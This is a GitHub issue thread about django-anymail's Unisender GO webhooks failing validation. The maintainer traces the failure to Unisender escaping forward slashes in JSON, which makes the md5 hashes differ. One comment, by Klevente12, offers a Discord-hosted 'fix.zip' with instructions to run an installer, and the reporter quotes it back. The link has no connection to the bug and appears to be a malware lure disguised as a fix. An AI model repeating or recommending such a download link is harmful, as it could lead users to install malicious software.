### ISSUE TITLE
Unisender GO raises AnymailWebhookValidationFailure on some webhook events

### ISSUE THREAD

**Issue by MikeVL** [anymail/django-anymail#398]
Reporting an error? It's helpful to know:

- Anymail version v11.1
- Unisender GO
- Versions of Django 4.1, requests, python 3.12
- EventType `SENT`, `DELIVERED` fine, but `OPENED`, `CLICKED` raises exception
- https://github.com/anymail/django-anymail/pull/397 (tested in prod)

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by MikeVL** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

What is this?

**Comment by medmunds** [comment]
I've managed to track down the underlying problem. It affects any Unisender Go webhook payload that includes a `/` in the JSON:
* All "clicked" events (the clicked `"url"` has slashes in `"https://..."`)
* All "opened" events if you have enabled "Additional information about delivery" (the `"user_agent"` typically includes slashes)
* All events—of any type—if the message was sent with metadata values that include a slash (e.g., `msg.metadata = {"date_joined": "2022/01/22"}`)

The problem is that Unisender Go's JSON serialization (unnecessarily) backslash-escapes forward slashes:
```json
{"url":"https:\/\/example.com\/"}
```
And Python's does not, meaning the md5 hashes don't match.

The proposed solution in your PR does solve the problem. While updating the tests, I uncovered several other issues in Anymail's current Unisender Go webhook implementation (and several missing test cases). So I'm going to open a new PR that pretty much rewrites that webhook and its tests.
